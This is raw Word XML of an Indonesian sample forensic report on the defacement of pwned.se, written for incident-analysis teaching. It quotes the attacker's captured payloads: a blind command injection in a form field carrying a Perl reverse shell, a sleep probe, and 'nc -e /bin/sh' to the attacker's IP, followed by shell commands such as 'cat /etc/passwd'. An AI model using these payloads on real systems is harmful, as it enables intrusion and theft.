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F56138" w14:textId="4B104A87" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CONTOH LAPORAN FORENSIK #BASIC</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="639F903C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="7B6D4767" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="2A59330E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Incident 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0864A5" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.pwned.se</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> dideface pada 12 Maret, 12:58 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C09EF7F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Tool yang kami gunakan: Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435C802" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="0E46CBA6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Karena insiden terjadi pada tanggal 12 maret, kita akan menganalisis log harian pada tanggal 12 Maret (file sensor_data/securityonion-eth1/dailylogs/2015-03-12/snort.log.1426118407)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF4764" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="7862A7FC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Laporan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD35485" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Server pwned.se memiliki IP a</w:t>
      </w:r>
      <w:r>
        <w:t>ddress 192.168.0.2. Jika kita lihat di bagian Statistics &gt; Conversation List &gt; TCP lalu sort berdasarkan Address B (yang menerima request) dan Bytes, kita lihat bahwa IP address yang paling banyak melakukan request adalah 217.195.49.146</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E7AC2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="218A1B6F" wp14:editId="4A4B2CE4">
            <wp:extent cx="4519613" cy="2393753"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="image03.png" descr="screenshot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creenshot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2393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85BD6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Setelah kita laku</w:t>
      </w:r>
      <w:r>
        <w:t>kan filter untuk request yang berasal dari IP 217.195.49.146, ternyata terdapat request-request yang mencurigakan. Kami mengasumsikan bahwa IP address penyerang adalah 217.195.49.146</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24080838" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="63302043" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Request-request yang mencurigakan berawal dari request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>POST /skyblue/ind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">ex.php?pid=4. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485294F6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Jika kita lihat isi request dari attacker (paket 82087), kita akan mendapatkan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23298D6A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cid=3&amp;name=2isJWANoDv%22%3bperl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3bforeach%20my%20%24key%28keys%20%25ENV%29%7bif%28%24ENV%7b%24key%7d%3d~/%28.%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>2a%29/%29%7b%24ENV%7b%24key%7d%3d%241%3b%7d%7d%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22217.195.49.146%3a63122%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24~-%3efdopen%28%24c%2cw%29%3bwhile%28%3c%3e%29%7bif%28%24_%3d~%20/%28.%2a%29/%29%7bsystem%2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>0%241%3b%7d%7d%3b%27%3b&amp;email=sn6WyuaPn9&amp;subject=0KIFa9WZyx&amp;message=DlAQJ8VwRb&amp;action=Send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C22F281" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="33BDEDEB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Dapat kita lihat bahwa field name diisi dengan hal-hal mencurigakan. Jika kita decode isi field name, kita mendapatkan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D2CE9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>perl -MIO -e '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990A6A2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>$p=fork;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D557356" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exit,if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>($p);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623685F4" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">foreach </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>key(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>keys %ENV){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDC811" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  if($ENV{$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>key}=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>~/(.*)/){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB119A0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">   $ENV{$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>key}=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>$1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04310D15" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF9F24" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001910FB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  $c=new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>IO::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Socket::INET(PeerAddr,"217.195.49.146:63122");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD2C0C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  STDIN-&gt;fdopen($</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>c,r</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7FB168" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  $~-&gt;fdopen($</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>c,w</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC5E396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while(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;&gt;){if($_=~ /(.*)/){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B8AE43" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    system $1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901FFBC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC7609" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55090D96" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B16EC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="5C8B36FF" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Jelas bahwa ini adalah serangan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>blind command injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Attacker mengetahui bahwa untuk mengirim pesan, server akan menjalankan command di shell. Attacker memulai dengan 2isJWANoDv"; di field name untuk menutup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">assignment </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">untuk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">field </w:t>
      </w:r>
      <w:r>
        <w:t>name, lalu menambahka</w:t>
      </w:r>
      <w:r>
        <w:t>n perintah-perintahnya sendiri.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9B79D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="4C960037" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Attacker menjalankan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">perl yang melakukan fork (membuat proses baru) yang akan mengoutputkan semua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">environment variable </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">yang ada di server pwned.se ke server attacker (217.195.49.146, port 63122). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31931353" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="72592CB8" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Setelah itu, attacker menjalankan beberapa perintah lain dengan metode yang sama. Contohnya adalah isi paket 82983:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62157951" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cid=3&amp;name="test";"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>sleep4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>"&amp;email=xxx&amp;subject=xxx&amp;message=xxx&amp;action=Send&amp;mailinglist=1&amp;cc=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBF69C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="4D90A4E0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Di request ini, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r>
        <w:t>mencoba menjalankan pe</w:t>
      </w:r>
      <w:r>
        <w:t>rintah sleep. Jika perintah ini berhasil, attacker dapat mengetahuinya dengan gampang (server akan merespon paling cepat dalam 4 detik). Ini dilakukan untuk mengetahui apakah kode yang dieksekusi di thread yang sama dengan webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4111F5EC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="691442B0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Attacker mencoba mela</w:t>
      </w:r>
      <w:r>
        <w:t>kukan netcat ke servernya sendiri dengan spawn sebuah shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F3F9D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Sesuai dengan isi paket 84347:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00485689" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">cid=3&amp;name=test" | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>nc -e /bin/sh 217.195.49.146 63122</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>; echo "&amp;email=xx@xx&amp;subject=xx&amp;message=xx&amp;action=Send&amp;mailinglist=1&amp;cc=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C79D8" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="2F4B3687" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Attacker menjalankan netcat yang menj</w:t>
      </w:r>
      <w:r>
        <w:t>alankan /bin/sh (bash) yang bisa diakses oleh attacker. Ini berarti jika attacker melakukan netcat ke server pwned.se, dia dapat melakukan perintah-perintah bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73779FD9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="4F3C3A9F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Karena attacker dapat menjalankan perintah bash lewat netcat, kita filter paket-paket yang b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">erhubungan dengan netcat dari attacker ke server pwned.se (ip.dst == 217.195.49.146 and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tcp.dstport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ==63122). Attacker melakukan beberapa kali netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1CA17" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Berikut adalah interaksinya (biru = input, hitam = output, output dipersingkat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD2B683" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0977A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>uid=48(apache) gid=48(apache) groups=48(apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB025FF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1CAE7916" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C680579" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6F3E8" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>root:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>x:0:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E7FC59" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C8BFEB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>apache:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>x:48:48</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>:Apache:/usr/share/httpd:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E776F30" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ned:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>x:1001:1001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>::/home/ned:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F175F4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0846F29A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5B312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35438B10" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/skyblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3AB043" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588F72C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>COPYING.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F1E23" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B405AD" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>trace_4711.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A72FA" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
